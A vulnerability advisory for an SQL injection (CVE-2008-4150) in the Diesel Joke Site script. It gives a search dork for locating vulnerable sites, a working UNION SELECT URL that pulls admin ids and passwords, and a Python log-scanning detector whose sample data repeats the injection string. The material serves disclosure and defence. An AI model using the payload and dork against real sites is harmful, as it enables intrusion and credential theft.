Bug: Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability ( Ascii Version )

Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability

Published: 2008.09.25
Credit: sarbot511
Risk: High
CWE: CWE-89
CVE: CVE-2008-4150
Local: No
Remote: Yes
Dork: "All Rights Reserved. Powered by DieselScripts.com"

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################## sarbot511 #########################################################
#
#
# jokes script Remote SQL Injection Exploit
#
# Found by: sarbot511
# Dork: "All Rights Reserved. Powered by DieselScripts.com"
#
##### Vuln Code: ###################################################################
#
#
###### Exploit #####################################################################
#
#
http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
#
###### Greets #######################################################################
#
# Dr.LiNuX, ABO3TB, ALM511, master, all my friends
#
####################################################################################
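Detection sketch for the request shape shown above, as an added example that is not part of the original advisory or the DieselScripts code: it scans web access logs for picture_category.php requests whose id parameter is not a plain integer. The log lines, the /jokes/ path, the combined log format and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (illustrative, not taken from the advisory).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Sep/2008:10:01:02 +0000] "GET /jokes/picture_category.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/Sep/2008:10:03:44 +0000] "GET /jokes/picture_category.php?id=-1%20union%20select%201,aid,3%20from%20admin/* HTTP/1.1" 200 734',
    '198.51.100.9 - - [25/Sep/2008:10:04:10 +0000] "GET /jokes/picture_category.php?id=7&id=7%27 HTTP/1.1" 200 611',
    '198.51.100.3 - - [25/Sep/2008:10:05:00 +0000] "GET /jokes/index.php?id=abc HTTP/1.1" 200 900',
    '198.51.100.4 - - [25/Sep/2008:10:06:00 +0000] "GET /jokes/picture_category.php HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a category id is a short non-negative decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")


def check_line(line):
    """Return (client_ip, decoded_id) when a picture_category.php request
    carries an id value that is not a plain integer, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/picture_category.php"):
        return None
    # parse_qs URL-decodes each value and keeps repeated parameters,
    # so a benign first id cannot hide a malformed second one.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if not VALID_ID.fullmatch(value):
            return line.split(" ", 1)[0], value
    return None


def scan(lines):
    """Return every (client_ip, decoded_id) hit found in the given log lines."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"suspicious id from {ip}: {value!r}")
```

The same allow-list (digits only) applied to id inside the script, together with a parameterized query, closes this class of injection at the source.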

References:

http://www.milw0rm.com/exploits/6488

Copyright 2014, cxsecurity.com